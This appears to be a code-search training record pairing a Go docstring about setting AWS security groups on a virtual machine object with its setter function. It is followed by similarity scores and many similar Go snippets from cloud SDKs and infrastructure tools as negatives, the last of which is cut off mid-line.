[ "0.82217926", "0.69316316", "0.6851042", "0.68082595", "0.6804337", "0.67036617", "0.6323814", "0.6295684", "0.62837297", "0.62552655", "0.6242088", "0.6223502", "0.6209826", "0.61676913", "0.60280645", "0.60165983", "0.59652287", "0.5922158", "0.59120315", "0.5886787", "0.5858628", "0.5858628", "0.58363765", "0.5802597", "0.57470936", "0.57233584", "0.5701294", "0.5699909", "0.5683837", "0.5680751", "0.5651708", "0.56459737", "0.56386405", "0.5631468", "0.5616259", "0.5590469", "0.55565226", "0.55484515", "0.55435914", "0.5529711", "0.5524957", "0.5490614", "0.546506", "0.5461899", "0.54285246", "0.5428319", "0.54136837", "0.540038", "0.5392171", "0.53860617", "0.53823674", "0.5373287", "0.53509295", "0.53464675", "0.5345086", "0.5329992", "0.5282324", "0.5278383", "0.5246391", "0.5237187", "0.5225626", "0.5225307", "0.5214904", "0.52139163", "0.52058995", "0.5183179", "0.5163269", "0.51412857", "0.5138791", "0.5134929", "0.5132135", "0.51240015", "0.5123354", "0.5121785", "0.5119304", "0.5118233", "0.5117804", "0.51168424", "0.510323", "0.5101433", "0.50930566", "0.5083343", "0.50715697", "0.5062244", "0.50552636", "0.50386995", "0.5037127", "0.5034565", "0.5031382", "0.5018991", "0.49983495", "0.49980694", "0.499676", "0.49924836", "0.4990264", "0.49839333", "0.498378", "0.49785975", "0.49777782", "0.4977107" ]
0.8029275
1
SetSecurityGroups gets a reference to the given []CloudAwsSecurityGroupRelationship and assigns it to the SecurityGroups field.
func (o *CloudAwsVirtualMachineAllOf) SetSecurityGroups(v []CloudAwsSecurityGroupRelationship) { o.SecurityGroups = v }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (o *CreateLoadBalancerRequest) SetSecurityGroups(v []string) {\n\to.SecurityGroups = &v\n}", "func (s *ModifyMountTargetSecurityGroupsInput) SetSecurityGroups(v []*string) *ModifyMountTargetSecurityGroupsInput {\n\ts.SecurityGroups = v\n\treturn s\n}", "func (s *DescribeMountTargetSecurityGroupsOutput) SetSecurityGroups(v []*string) *DescribeMountTargetSecurityGroupsOutput {\n\ts.SecurityGroups = v\n\treturn s\n}", "func (s *CreateMountTargetInput) SetSecurityGroups(v []*string) *CreateMountTargetInput {\n\ts.SecurityGroups = v\n\treturn s\n}", "func (s *DefaultSpaceSettings) SetSecurityGroups(v []*string) *DefaultSpaceSettings {\n\ts.SecurityGroups = v\n\treturn s\n}", "func (s *DescribeNotebookInstanceOutput) SetSecurityGroups(v []*string) *DescribeNotebookInstanceOutput {\n\ts.SecurityGroups = v\n\treturn s\n}", "func (s *UserSettings) SetSecurityGroups(v []*string) *UserSettings {\n\ts.SecurityGroups = v\n\treturn s\n}", "func (s *AwsVpcConfiguration) SetSecurityGroups(v []*string) *AwsVpcConfiguration {\n\ts.SecurityGroups = v\n\treturn s\n}", "func (s *NASSecurityGroup) SetSecurityGroups(v []*SecurityGroup) *NASSecurityGroup {\n\ts.SecurityGroups = v\n\treturn s\n}", "func (c *Client) AssociateSecurityGroups(request *AssociateSecurityGroupsRequest) (response *AssociateSecurityGroupsResponse, err error) {\n return c.AssociateSecurityGroupsWithContext(context.Background(), request)\n}", "func setSecurityGroups(c *cli.Context) error {\n\terr := checkArgCount(c, 2)\n\tif err != nil {\n\t\treturn err\n\t}\n\tid := c.Args().First()\n\titems := []string{}\n\tif c.Args()[1] != \"\" {\n\t\titems = regexp.MustCompile(`\\s*,\\s*`).Split(c.Args()[1], -1)\n\t}\n\tsecurityGroups := &photon.SecurityGroupsSpec{\n\t\tItems: items,\n\t}\n\n\tclient.Photonclient, err = client.GetClient(c)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\ttask, err := client.Photonclient.Tenants.SetSecurityGroups(id, securityGroups)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t_, err = waitOnTaskOperation(task.ID, c)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func (o *CloudAwsVirtualMachineAllOf) GetSecurityGroups() []CloudAwsSecurityGroupRelationship {\n\tif o == nil {\n\t\tvar ret []CloudAwsSecurityGroupRelationship\n\t\treturn ret\n\t}\n\treturn o.SecurityGroups\n}", "func (s *ResolverEndpoint) SetSecurityGroupIds(v []*string) *ResolverEndpoint {\n\ts.SecurityGroupIds = v\n\treturn s\n}", "func (s *ResolverEndpoint) SetSecurityGroupIds(v []*string) *ResolverEndpoint {\n\ts.SecurityGroupIds = v\n\treturn s\n}", "func (c *Client) BindSecurityGroups(args *BindSecurityGroupsArgs) error {\n\tjsonBytes, jsonErr := json.Marshal(args)\n\tif jsonErr != nil {\n\t\treturn jsonErr\n\t}\n\tbody, err := bce.NewBodyFromBytes(jsonBytes)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn BindSecurityGroups(c, body)\n}", "func (o *FiltersVmGroup) SetSecurityGroupIds(v []string) {\n\to.SecurityGroupIds = &v\n}", "func setDeploymentSecurityGroups(c *cli.Context) error {\n\tvar err error\n\tvar deploymentId string\n\tvar groups string\n\n\t// We have two cases:\n\t// Case 1: arguments are: id groups\n\t// Case 2: arguments are: groups\n\tif len(c.Args()) == 2 {\n\t\tdeploymentId = c.Args()[0]\n\t\tgroups = c.Args()[1]\n\t} else if len(c.Args()) == 1 {\n\t\tdeploymentId, err = getDefaultDeploymentId(c)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tgroups = c.Args()[0]\n\t} else {\n\t\treturn fmt.Errorf(\"Usage: deployments set-security-groups [id] groups\")\n\t}\n\n\titems := regexp.MustCompile(`\\s*,\\s*`).Split(groups, -1)\n\tsecurityGroups := &photon.SecurityGroupsSpec{\n\t\tItems: items,\n\t}\n\n\tclient.Photonclient, err = client.GetClient(c)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\ttask, err := client.Photonclient.Deployments.SetSecurityGroups(deploymentId, securityGroups)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t_, err = waitOnTaskOperation(task.ID, c)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\terr = deploymentJsonHelper(c, deploymentId, client.Photonclient)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func (s *DomainSettingsForUpdate) SetSecurityGroupIds(v []*string) *DomainSettingsForUpdate {\n\ts.SecurityGroupIds = v\n\treturn s\n}", "func (o *FiltersSecurityGroup) SetSecurityGroupIds(v []string) {\n\to.SecurityGroupIds = &v\n}", "func (s *NeoVpcConfig) SetSecurityGroupIds(v []*string) *NeoVpcConfig {\n\ts.SecurityGroupIds = v\n\treturn s\n}", "func (s *WorkforceVpcConfigResponse) SetSecurityGroupIds(v []*string) *WorkforceVpcConfigResponse {\n\ts.SecurityGroupIds = v\n\treturn s\n}", "func (s *WorkforceVpcConfigRequest) SetSecurityGroupIds(v []*string) *WorkforceVpcConfigRequest {\n\ts.SecurityGroupIds = v\n\treturn s\n}", "func (s *RecommendationJobVpcConfig) SetSecurityGroupIds(v []*string) *RecommendationJobVpcConfig {\n\ts.SecurityGroupIds = v\n\treturn s\n}", "func (s *DomainSettings) SetSecurityGroupIds(v []*string) *DomainSettings {\n\ts.SecurityGroupIds = v\n\treturn s\n}", "func (s *CreateResolverEndpointInput) SetSecurityGroupIds(v []*string) *CreateResolverEndpointInput {\n\ts.SecurityGroupIds = v\n\treturn s\n}", "func (s *CreateResolverEndpointInput) SetSecurityGroupIds(v []*string) *CreateResolverEndpointInput {\n\ts.SecurityGroupIds = v\n\treturn s\n}", "func SecurityGroups(groups ...string) RequestOptionFunc {\n\treturn func(body *RequestBody) error {\n\t\tbody.SecurityGroup = groups\n\t\treturn nil\n\t}\n}", "func (s *UpdateNetworkSettingsInput) SetSecurityGroupIds(v []*string) *UpdateNetworkSettingsInput {\n\ts.SecurityGroupIds = v\n\treturn s\n}", "func (s *VpcConfigResponse) SetSecurityGroupIds(v []*string) *VpcConfigResponse {\n\ts.SecurityGroupIds = v\n\treturn s\n}", "func (o TopicRuleDestinationVpcConfigurationOutput) SecurityGroups() pulumi.StringArrayOutput {\n\treturn o.ApplyT(func(v TopicRuleDestinationVpcConfiguration) []string { return v.SecurityGroups }).(pulumi.StringArrayOutput)\n}", "func (s *NetworkSettings) SetSecurityGroupIds(v []*string) *NetworkSettings {\n\ts.SecurityGroupIds = v\n\treturn s\n}", "func (s *CreateNetworkSettingsInput) SetSecurityGroupIds(v []*string) *CreateNetworkSettingsInput {\n\ts.SecurityGroupIds = v\n\treturn s\n}", "func (s *CreateNotebookInstanceInput) SetSecurityGroupIds(v []*string) *CreateNotebookInstanceInput {\n\ts.SecurityGroupIds = v\n\treturn s\n}", "func (s *VpcConfigRequest) SetSecurityGroupIds(v []*string) *VpcConfigRequest {\n\ts.SecurityGroupIds = v\n\treturn s\n}", "func (instance *Host) setSecurityGroups(ctx context.Context, req abstract.HostRequest, defaultSubnet resources.Subnet) fail.Error {\n\tsvc := instance.Service()\n\tif req.Single {\n\t\thostID, err := instance.GetID()\n\t\tif err != nil {\n\t\t\treturn fail.ConvertError(err)\n\t\t}\n\t\tfor k := range req.SecurityGroupIDs {\n\t\t\tif k != \"\" {\n\t\t\t\tlogrus.WithContext(ctx).Infof(\"Binding security group with id %s to host %s\", k, hostID)\n\t\t\t\txerr := svc.BindSecurityGroupToHost(ctx, k, hostID)\n\t\t\t\txerr = debug.InjectPlannedFail(xerr)\n\t\t\t\tif xerr != nil {\n\t\t\t\t\treturn xerr\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\treturn nil\n\t}\n\n\txerr := instance.Alter(ctx, func(clonable data.Clonable, props *serialize.JSONProperties) fail.Error {\n\t\treturn props.Alter(hostproperty.SecurityGroupsV1, func(clonable data.Clonable) (finnerXErr fail.Error) {\n\t\t\thsgV1, ok := clonable.(*propertiesv1.HostSecurityGroups)\n\t\t\tif !ok {\n\t\t\t\treturn fail.InconsistentError(\"'*propertiesv1.HostSecurityGroups' expected, '%s' provided\", reflect.TypeOf(clonable).String())\n\t\t\t}\n\n\t\t\t// get default Subnet core data\n\t\t\tvar (\n\t\t\t\tdefaultAbstractSubnet *abstract.Subnet\n\t\t\t\tdefaultSubnetID string\n\t\t\t)\n\t\t\tinnerXErr := defaultSubnet.Inspect(ctx,\n\t\t\t\tfunc(clonable data.Clonable, _ *serialize.JSONProperties) fail.Error {\n\t\t\t\t\tvar ok bool\n\t\t\t\t\tdefaultAbstractSubnet, ok = clonable.(*abstract.Subnet)\n\t\t\t\t\tif !ok {\n\t\t\t\t\t\treturn fail.InconsistentError(\"'*abstract.Subnet' expected, '%s' provided\", reflect.TypeOf(clonable).String())\n\t\t\t\t\t}\n\n\t\t\t\t\tdefaultSubnetID = defaultAbstractSubnet.ID\n\t\t\t\t\treturn nil\n\t\t\t\t},\n\t\t\t)\n\t\t\tif innerXErr != nil {\n\t\t\t\treturn innerXErr\n\t\t\t}\n\n\t\t\tvar gwsg, pubipsg, lansg resources.SecurityGroup\n\n\t\t\t// Apply Security Group for gateways in default Subnet\n\t\t\tif req.IsGateway && defaultAbstractSubnet.GWSecurityGroupID != \"\" {\n\t\t\t\tgwsg, innerXErr = LoadSecurityGroup(ctx, svc, defaultAbstractSubnet.GWSecurityGroupID)\n\t\t\t\tif innerXErr != nil {\n\t\t\t\t\treturn fail.Wrap(innerXErr, \"failed to query Subnet '%s' Security Group '%s'\", defaultSubnet.GetName(), defaultAbstractSubnet.GWSecurityGroupID)\n\t\t\t\t}\n\n\t\t\t\tinnerXErr = gwsg.BindToHost(ctx, instance, resources.SecurityGroupEnable, resources.MarkSecurityGroupAsSupplemental)\n\t\t\t\tif innerXErr != nil {\n\t\t\t\t\treturn fail.Wrap(innerXErr, \"failed to apply Subnet's GW Security Group for gateway '%s' on Host '%s'\", gwsg.GetName(), req.ResourceName)\n\t\t\t\t}\n\n\t\t\t\tdefer func() {\n\t\t\t\t\tif finnerXErr != nil && !req.KeepOnFailure {\n\t\t\t\t\t\tderr := gwsg.UnbindFromHost(cleanupContextFrom(ctx), instance)\n\t\t\t\t\t\tif derr != nil {\n\t\t\t\t\t\t\t_ = finnerXErr.AddConsequence(fail.Wrap(derr, \"cleaning up on %s, failed to unbind Security Group '%s' from Host '%s'\", ActionFromError(finnerXErr), gwsg.GetName(), req.ResourceName))\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}()\n\n\t\t\t\tgwid, err := gwsg.GetID()\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn fail.ConvertError(err)\n\t\t\t\t}\n\n\t\t\t\titem := &propertiesv1.SecurityGroupBond{\n\t\t\t\t\tID: gwid,\n\t\t\t\t\tName: gwsg.GetName(),\n\t\t\t\t\tDisabled: false,\n\t\t\t\t\tFromSubnet: true,\n\t\t\t\t}\n\t\t\t\thsgV1.ByID[item.ID] = item\n\t\t\t\thsgV1.ByName[item.Name] = item.ID\n\t\t\t}\n\n\t\t\t// Apply Security Group for hosts with public IP in default Subnet\n\t\t\tif (req.IsGateway || req.PublicIP) && defaultAbstractSubnet.PublicIPSecurityGroupID != \"\" {\n\t\t\t\tpubipsg, innerXErr = LoadSecurityGroup(ctx, svc, defaultAbstractSubnet.PublicIPSecurityGroupID)\n\t\t\t\tif innerXErr != nil {\n\t\t\t\t\treturn fail.Wrap(innerXErr, \"failed to query Subnet '%s' Security Group with ID %s\", defaultSubnet.GetName(), defaultAbstractSubnet.PublicIPSecurityGroupID)\n\t\t\t\t}\n\n\t\t\t\tinnerXErr = pubipsg.BindToHost(ctx, instance, resources.SecurityGroupEnable, resources.MarkSecurityGroupAsSupplemental)\n\t\t\t\tif innerXErr != nil {\n\t\t\t\t\treturn fail.Wrap(innerXErr, \"failed to apply Subnet's Public Security Group for gateway '%s' on Host '%s'\", pubipsg.GetName(), req.ResourceName)\n\t\t\t\t}\n\n\t\t\t\tdefer func() {\n\t\t\t\t\tif finnerXErr != nil && !req.KeepOnFailure {\n\t\t\t\t\t\tderr := pubipsg.UnbindFromHost(cleanupContextFrom(ctx), instance)\n\t\t\t\t\t\tif derr != nil {\n\t\t\t\t\t\t\t_ = finnerXErr.AddConsequence(fail.Wrap(derr, \"cleaning up on %s, failed to unbind Security Group '%s' from Host '%s'\", ActionFromError(finnerXErr), pubipsg.GetName(), req.ResourceName))\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}()\n\n\t\t\t\tpubID, err := pubipsg.GetID()\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn fail.ConvertError(err)\n\t\t\t\t}\n\n\t\t\t\titem := &propertiesv1.SecurityGroupBond{\n\t\t\t\t\tID: pubID,\n\t\t\t\t\tName: pubipsg.GetName(),\n\t\t\t\t\tDisabled: false,\n\t\t\t\t\tFromSubnet: true,\n\t\t\t\t}\n\t\t\t\thsgV1.ByID[item.ID] = item\n\t\t\t\thsgV1.ByName[item.Name] = item.ID\n\t\t\t}\n\n\t\t\t// Apply internal Security Group of each other subnets\n\t\t\tdefer func() {\n\t\t\t\tif finnerXErr != nil && !req.KeepOnFailure {\n\t\t\t\t\tvar (\n\t\t\t\t\t\tsg resources.SecurityGroup\n\t\t\t\t\t\tderr error\n\t\t\t\t\t\terrs []error\n\t\t\t\t\t)\n\t\t\t\t\tfor _, v := range req.Subnets {\n\t\t\t\t\t\tif v.ID == defaultSubnetID {\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t}\n\n\t\t\t\t\t\tsubnetInstance, deeperXErr := LoadSubnet(cleanupContextFrom(ctx), svc, \"\", v.ID)\n\t\t\t\t\t\tif deeperXErr != nil {\n\t\t\t\t\t\t\t_ = innerXErr.AddConsequence(deeperXErr)\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t}\n\n\t\t\t\t\t\tsgName := sg.GetName()\n\t\t\t\t\t\tdeeperXErr = subnetInstance.Inspect(cleanupContextFrom(ctx), func(\n\t\t\t\t\t\t\tclonable data.Clonable, _ *serialize.JSONProperties,\n\t\t\t\t\t\t) fail.Error {\n\t\t\t\t\t\t\tabstractSubnet, ok := clonable.(*abstract.Subnet)\n\t\t\t\t\t\t\tif !ok {\n\t\t\t\t\t\t\t\treturn fail.InconsistentError(\"'*abstract.Subnet' expected, '%s' provided\", reflect.TypeOf(clonable).String())\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\tif abstractSubnet.InternalSecurityGroupID != \"\" {\n\t\t\t\t\t\t\t\tsg, derr = LoadSecurityGroup(cleanupContextFrom(ctx), svc, abstractSubnet.InternalSecurityGroupID)\n\t\t\t\t\t\t\t\tif derr != nil {\n\t\t\t\t\t\t\t\t\terrs = append(errs, derr)\n\t\t\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\t\t\tderr = sg.UnbindFromHost(cleanupContextFrom(ctx), instance)\n\t\t\t\t\t\t\t\t\tif derr != nil {\n\t\t\t\t\t\t\t\t\t\terrs = append(errs, derr)\n\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\treturn nil\n\t\t\t\t\t\t})\n\t\t\t\t\t\tif deeperXErr != nil {\n\t\t\t\t\t\t\t_ = finnerXErr.AddConsequence(fail.Wrap(deeperXErr, \"cleaning up on failure, failed to unbind Security Group '%s' from Host\", sgName))\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\tif len(errs) > 0 {\n\t\t\t\t\t\t_ = finnerXErr.AddConsequence(fail.Wrap(fail.NewErrorList(errs), \"failed to unbind Subnets Security Group from Host '%s'\", sg.GetName(), req.ResourceName))\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}()\n\n\t\t\tfor _, v := range req.Subnets {\n\t\t\t\t// Do not try to bind defaultSubnet on gateway, because this code is running under a lock on defaultSubnet in this case, and this will lead to deadlock\n\t\t\t\t// (binding of gateway on defaultSubnet is done inside Subnet.Create() call)\n\t\t\t\tif req.IsGateway && v.ID == defaultSubnetID {\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\n\t\t\t\totherSubnetInstance, innerXErr := LoadSubnet(ctx, svc, \"\", v.ID)\n\t\t\t\tinnerXErr = debug.InjectPlannedFail(innerXErr)\n\t\t\t\tif innerXErr != nil {\n\t\t\t\t\treturn innerXErr\n\t\t\t\t}\n\n\t\t\t\tvar otherAbstractSubnet *abstract.Subnet\n\t\t\t\tinnerXErr = otherSubnetInstance.Inspect(ctx, func(\n\t\t\t\t\tclonable data.Clonable, _ *serialize.JSONProperties,\n\t\t\t\t) fail.Error {\n\t\t\t\t\tvar ok bool\n\t\t\t\t\totherAbstractSubnet, ok = clonable.(*abstract.Subnet)\n\t\t\t\t\tif !ok {\n\t\t\t\t\t\treturn fail.InconsistentError(\"'*abstract.Subnet' expected, '%s' provided\", reflect.TypeOf(clonable).String())\n\t\t\t\t\t}\n\t\t\t\t\t_ = otherAbstractSubnet\n\n\t\t\t\t\treturn nil\n\t\t\t\t})\n\t\t\t\tif innerXErr != nil {\n\t\t\t\t\treturn innerXErr\n\t\t\t\t}\n\n\t\t\t\tsafe := false\n\n\t\t\t\t// Fix for Stein\n\t\t\t\t{\n\t\t\t\t\tst, xerr := svc.GetProviderName()\n\t\t\t\t\tif xerr != nil {\n\t\t\t\t\t\treturn xerr\n\t\t\t\t\t}\n\t\t\t\t\tif st != \"ovh\" {\n\t\t\t\t\t\tsafe = true\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\tif cfg, xerr := svc.GetConfigurationOptions(ctx); xerr == nil {\n\t\t\t\t\tif aval, ok := cfg.Get(\"Safe\"); ok {\n\t\t\t\t\t\tif val, ok := aval.(bool); ok {\n\t\t\t\t\t\t\tsafe = val\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\tif otherAbstractSubnet.InternalSecurityGroupID != \"\" {\n\t\t\t\t\tlansg, innerXErr = LoadSecurityGroup(ctx, svc, otherAbstractSubnet.InternalSecurityGroupID)\n\t\t\t\t\tif innerXErr != nil {\n\t\t\t\t\t\treturn fail.Wrap(innerXErr, \"failed to load Subnet '%s' internal Security Group %s\", otherAbstractSubnet.Name, otherAbstractSubnet.InternalSecurityGroupID)\n\t\t\t\t\t}\n\n\t\t\t\t\tif !safe {\n\t\t\t\t\t\tinnerXErr = svc.ChangeSecurityGroupSecurity(ctx, false, true, otherAbstractSubnet.Network, \"\")\n\t\t\t\t\t\tif innerXErr != nil {\n\t\t\t\t\t\t\treturn fail.Wrap(innerXErr, \"failed to change security group\")\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\n\t\t\t\t\tinnerXErr = lansg.BindToHost(ctx, instance, resources.SecurityGroupEnable, resources.MarkSecurityGroupAsSupplemental)\n\t\t\t\t\tif innerXErr != nil {\n\t\t\t\t\t\treturn fail.Wrap(innerXErr, \"failed to apply Subnet '%s' internal Security Group '%s' to Host '%s'\", otherAbstractSubnet.Name, lansg.GetName(), req.ResourceName)\n\t\t\t\t\t}\n\n\t\t\t\t\tif !safe {\n\t\t\t\t\t\tinnerXErr = svc.ChangeSecurityGroupSecurity(ctx, true, false, otherAbstractSubnet.Network, \"\")\n\t\t\t\t\t\tif innerXErr != nil {\n\t\t\t\t\t\t\treturn fail.Wrap(innerXErr, \"failed to change security group\")\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\n\t\t\t\t\tlangID, err := lansg.GetID()\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn fail.ConvertError(err)\n\t\t\t\t\t}\n\n\t\t\t\t\t// register security group in properties\n\t\t\t\t\titem := &propertiesv1.SecurityGroupBond{\n\t\t\t\t\t\tID: langID,\n\t\t\t\t\t\tName: lansg.GetName(),\n\t\t\t\t\t\tDisabled: false,\n\t\t\t\t\t\tFromSubnet: true,\n\t\t\t\t\t}\n\t\t\t\t\thsgV1.ByID[item.ID] = item\n\t\t\t\t\thsgV1.ByName[item.Name] = item.ID\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\treturn nil\n\t\t})\n\t})\n\tif xerr != nil {\n\t\treturn xerr\n\t}\n\n\treturn nil\n}", "func (v *Vps) PopulateSecurityGroups(os *OpenStack) error {\n\tvar err error\n\n\t// Security Groups\n\tresult := servers.GetResult{}\n\turl := os.Compute.ServiceURL(\"servers\", v.ID, \"os-security-groups\")\n\t_, err = os.Compute.Get(url, &result.Body, nil)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tvar resp struct {\n\t\tSecurityGroups []secgroups.SecurityGroup `mapstructure:\"security_groups\"`\n\t}\n\n\tif err = mapstructure.Decode(result.Body, &resp); err != nil {\n\t\treturn err\n\t}\n\tv.SecurityGroups = resp.SecurityGroups\n\n\treturn nil\n}", "func (s *VpcConfig) SetSecurityGroupIds(v []*string) *VpcConfig {\n\ts.SecurityGroupIds = v\n\treturn s\n}", "func (s *UpdateWorkgroupInput) SetSecurityGroupIds(v []*string) *UpdateWorkgroupInput {\n\ts.SecurityGroupIds = v\n\treturn s\n}", "func (s *Workgroup) SetSecurityGroupIds(v []*string) *Workgroup {\n\ts.SecurityGroupIds = v\n\treturn s\n}", "func (o EnvironmentNetworkConfigurationOutput) SecurityGroupIds() pulumi.StringArrayOutput {\n\treturn o.ApplyT(func(v EnvironmentNetworkConfiguration) []string { return v.SecurityGroupIds }).(pulumi.StringArrayOutput)\n}", "func (s *CreateWorkgroupInput) SetSecurityGroupIds(v []*string) *CreateWorkgroupInput {\n\ts.SecurityGroupIds = v\n\treturn s\n}", "func (c *Client) DisassociateSecurityGroups(request *DisassociateSecurityGroupsRequest) (response *DisassociateSecurityGroupsResponse, err error) {\n return c.DisassociateSecurityGroupsWithContext(context.Background(), request)\n}", "func (o InstanceOutput) SecurityGroups() pulumi.StringArrayOutput {\n\treturn o.ApplyT(func(v *Instance) pulumi.StringArrayOutput { return v.SecurityGroups }).(pulumi.StringArrayOutput)\n}", "func (o *SecurityGroup) SetSecurityGroupId(v string) {\n\to.SecurityGroupId = &v\n}", "func (r *LaunchConfiguration) SecurityGroups() pulumi.ArrayOutput {\n\treturn (pulumi.ArrayOutput)(r.s.State[\"securityGroups\"])\n}", "func (s *EndpointAccess) SetVpcSecurityGroups(v []*VpcSecurityGroupMembership) *EndpointAccess {\n\ts.VpcSecurityGroups = v\n\treturn s\n}", "func (o *CreateLoadBalancerRequest) GetSecurityGroups() []string {\n\tif o == nil || o.SecurityGroups == nil {\n\t\tvar ret []string\n\t\treturn ret\n\t}\n\treturn *o.SecurityGroups\n}", "func (o TopicRuleDestinationVpcConfigurationPtrOutput) SecurityGroups() pulumi.StringArrayOutput {\n\treturn o.ApplyT(func(v *TopicRuleDestinationVpcConfiguration) []string {\n\t\tif v == nil {\n\t\t\treturn nil\n\t\t}\n\t\treturn v.SecurityGroups\n\t}).(pulumi.StringArrayOutput)\n}", "func (o EnvironmentNetworkConfigurationPtrOutput) SecurityGroupIds() pulumi.StringArrayOutput {\n\treturn o.ApplyT(func(v *EnvironmentNetworkConfiguration) []string {\n\t\tif v == nil {\n\t\t\treturn nil\n\t\t}\n\t\treturn v.SecurityGroupIds\n\t}).(pulumi.StringArrayOutput)\n}", "func (o ClusterOutput) SecurityGroupIds() pulumi.StringArrayOutput {\n\treturn o.ApplyT(func(v *Cluster) pulumi.StringArrayOutput { return v.SecurityGroupIds }).(pulumi.StringArrayOutput)\n}", "func (instance *Host) BindSecurityGroup(ctx context.Context, sgInstance resources.SecurityGroup, enable resources.SecurityGroupActivation) (ferr fail.Error) {\n\tdefer fail.OnPanic(&ferr)\n\n\tif valid.IsNil(instance) {\n\t\treturn fail.InvalidInstanceError()\n\t}\n\tif ctx == nil {\n\t\treturn fail.InvalidParameterCannotBeNilError(\"ctx\")\n\t}\n\tif sgInstance == nil {\n\t\treturn fail.InvalidParameterCannotBeNilError(\"sgInstance\")\n\t}\n\n\t// instance.Lock()\n\t// defer instance.Unlock()\n\n\txerr := instance.Alter(ctx, func(_ data.Clonable, props *serialize.JSONProperties) fail.Error {\n\t\treturn props.Alter(hostproperty.SecurityGroupsV1, func(clonable data.Clonable) fail.Error {\n\t\t\thsgV1, ok := clonable.(*propertiesv1.HostSecurityGroups)\n\t\t\tif !ok {\n\t\t\t\treturn fail.InconsistentError(\"'*propertiesv1.HostSecurityGroups' expected, '%s' provided\", reflect.TypeOf(clonable).String())\n\t\t\t}\n\n\t\t\tsgID, err := sgInstance.GetID()\n\t\t\tif err != nil {\n\t\t\t\treturn fail.ConvertError(err)\n\t\t\t}\n\n\t\t\t// If the Security Group is already bound to the Host with the exact same state, considered as a success\n\t\t\titem, ok := hsgV1.ByID[sgID]\n\t\t\tif ok && item.Disabled == !bool(enable) {\n\t\t\t\treturn nil\n\t\t\t}\n\n\t\t\tif !ok { // Not found, update bind metadata of Host\n\t\t\t\titem = &propertiesv1.SecurityGroupBond{\n\t\t\t\t\tID: sgID,\n\t\t\t\t\tName: sgInstance.GetName(),\n\t\t\t\t}\n\t\t\t\thsgV1.ByID[sgID] = item\n\t\t\t\thsgV1.ByName[item.Name] = item.ID\n\t\t\t}\n\t\t\titem.Disabled = bool(!enable)\n\n\t\t\t// If enabled, apply it\n\t\t\tsgInstanceImpl, ok := sgInstance.(*SecurityGroup)\n\t\t\tif !ok {\n\t\t\t\treturn fail.InconsistentError(\"failed to cast sgInstance to '*SecurityGroup\")\n\t\t\t}\n\n\t\t\tinnerXErr := sgInstanceImpl.unsafeBindToHost(ctx, instance, enable, resources.MarkSecurityGroupAsSupplemental)\n\t\t\tif innerXErr != nil {\n\t\t\t\tswitch innerXErr.(type) {\n\t\t\t\tcase *fail.ErrDuplicate:\n\t\t\t\t\t// already bound, consider as a success\n\t\t\t\t\tbreak\n\t\t\t\tdefault:\n\t\t\t\t\treturn innerXErr\n\t\t\t\t}\n\t\t\t}\n\t\t\treturn nil\n\t\t})\n\t})\n\tif xerr != nil {\n\t\treturn xerr\n\t}\n\n\treturn nil\n}", "func (o GetVpcEndpointsEndpointOutput) SecurityGroupIds() pulumi.StringArrayOutput {\n\treturn o.ApplyT(func(v GetVpcEndpointsEndpoint) []string { return v.SecurityGroupIds }).(pulumi.StringArrayOutput)\n}", "func (c *Canary) DetachSecurityGroup(nis []*ec2.InstanceNetworkInterface, region schemas.RegionConfig, excludeSg string) error {\n\tclient, err := selectClientFromList(c.AWSClients, region.Region)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tfor _, ni := range nis {\n\t\tvar sgs []*string\n\t\tfor _, group := range ni.Groups {\n\t\t\tif *group.GroupId != excludeSg {\n\t\t\t\tsgs = append(sgs, group.GroupId)\n\t\t\t}\n\t\t}\n\t\tif len(sgs) > 0 {\n\t\t\terr = client.EC2Service.ModifyNetworkInterfaces(ni.NetworkInterfaceId, sgs)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tc.Logger.Debugf(\"Remove security group from eni: %s\", *ni.NetworkInterfaceId)\n\t\t}\n\t}\n\n\treturn nil\n}", "func (t *TokenGroupsT) SetGroupsSlice(s []SidAndAttributes) {\n\ts1 := []SidAndAttributes{}\n\thdr := (*reflect.SliceHeader)(unsafe.Pointer(&s1))\n\thdr.Data = uintptr(unsafe.Pointer(&t.Groups[0]))\n\thdr.Len = len(s)\n\thdr.Cap = len(s)\n\tcopy(s1, s)\n}", "func (o OceanOutput) SecurityGroupIds() pulumi.StringArrayOutput {\n\treturn o.ApplyT(func(v *Ocean) pulumi.StringArrayOutput { return v.SecurityGroupIds }).(pulumi.StringArrayOutput)\n}", "func (o *CloudAwsVirtualMachineAllOf) HasSecurityGroups() bool {\n\tif o != nil && o.SecurityGroups != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (client 